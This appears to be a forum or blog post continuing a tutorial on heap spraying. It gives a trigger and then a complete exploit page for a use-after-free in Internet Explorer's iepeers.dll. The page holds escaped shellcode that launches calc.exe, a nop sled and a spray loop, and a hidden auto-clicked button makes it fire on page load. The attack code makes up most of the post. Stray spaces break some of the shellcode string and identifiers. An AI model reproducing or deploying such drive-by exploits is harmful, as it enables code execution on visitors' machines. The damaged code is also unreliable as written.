• Heap Spray --- Slipping CPU to our pocket--continued

    Above exploit will take nearly a minute to spraY the heap. Also study the performance graph of memory and cpu in taskmanager for
    better understanding the heap spray technique.


    2. IE iepeers:

    The following code can trigger the vulnerability in ieepeers.dll in internet explorer:


    <html><body>
    <button id='butid' onclick='trigger();' style='display:none'></button>

    <!--place the sprayer here---->

    spray=new Array();var i=0;
    for(i=0;i<500;i++){spray[i]=nopsled+shellcode;}
    function trigger(){
    var varbdy = document.createElement('body');
    varbdy.addBehavior('#default#userData');
    document.appendChild(varbdy);
    try {
    for (iter=0; iter<10; iter++) {
    varbdy.setAttribute('s',window);
    }
    } catch(e){ }
    window.status+='';
    }
    document.getElementById('butid').onclick();
    </script></body></html>



    So for above vulnerability, following is the heap spray exploit with calc.exe shellcode:

    <!----------------------iepeers.htm------------------>
    <html><body>
    <button id='butid' onclick='trigger();' style='display:none'></button>
    <script language='javascript'>
    /*----------heap sprayer------------------*/
    var shellcode=unescape('%u9090%u9090%u9090%u9090%uceba %u11fa%u291f%ub1c9%udb33%ud9ce%u2474%u5ef4%u5631%u 030e%u0e56%u0883%uf3fe%u68ea%u7a17%u9014%u1de8%u75 9c%u0fd9%ufefa%u8048%u5288%u6b61%u46dc%u19f2%u69c9 %u94b3%u442f%u1944%u0af0%u3b86%u508c%u9bdb%u9bad%u dd2e%uc1ea%u8fc1%u8ea3%u2070%ud2c7%u4148%u5907%u39 f0%u9d22%uf385%ucd2d%u8f36%uf566%ud73d%u0456%u0b91 %u4faa%uf89e%u4e58%u3176%u61a0%u9eb6%u4e9f%ude3b%u 68d8%u95a4%u8b12%uae59%uf6e0%u3b85%u50f5%u9b4d%u61 dd%u7a82%u6d95%u086f%u71f1%udd6e%u8d89%ue0fb%u045d %uc6bf%u4d79%u661b%u2bdb%u97ca%u933b%u3db3%u3137%u 44a7%u5f1a%uc436%u2620%ud638%u082a%ue751%uc7a1%uf8 26%uac63%u1ac9%ud8a6%u8361%u6123%u34ec%ua59e%ub709 %u552b%ua7ee%u5059%u6faa%u28b1%u05a3%u9fb5%u0fc4%u 7ed6%ud357%ue537%u76df%u4148');
    bigblock=unescape("%u0D0D%u0D0D");
    headersize=20;shellcodesize=headersize+shellcode.l ength;
    while(bigblock.length<shellcodesize){bigblock+=big block;}
    heapshell=bigblock.substring(0,shellcodesize);
    nopsled=bigblock.substring(0,bigblock.length-shellcodesize);
    while(nopsled.length+shellcodesize<0x25000){nopsle d=nopsled+nopsled+heapshell}

    spray=new Array();var i=0;
    for(i=0;i<500;i++){spray[i]=nopsled+shellcode;}
    /*--------------spray code end---------------------*/

    function trigger(){
    var varbdy = document.createElement('body');
    varbdy.addBehavior('#default#userData');
    document.appendChild(varbdy);
    try {
    for (iter=0; iter<10; iter++) {
    varbdy.setAttribute('s',window);
    }
    } catch(e){ }
    window.status+='';
    }
    document.getElementById('butid').onclick();
    </script></body></html>
    <!----------------------iepeers.htm------------------>


    The spray area for iepeers exploit for IE6 is small and thus exploit runtime is efficiently faster.


    The story doesnt end here, study more for more expertisation over code execution and heap spray technique..."vinnu"
    This article was originally published in blog: Heap Spray --- Slipping CPU to our pocket--continued started by prashant_uniyal
  • G4H Facebook

  • G4H Twitter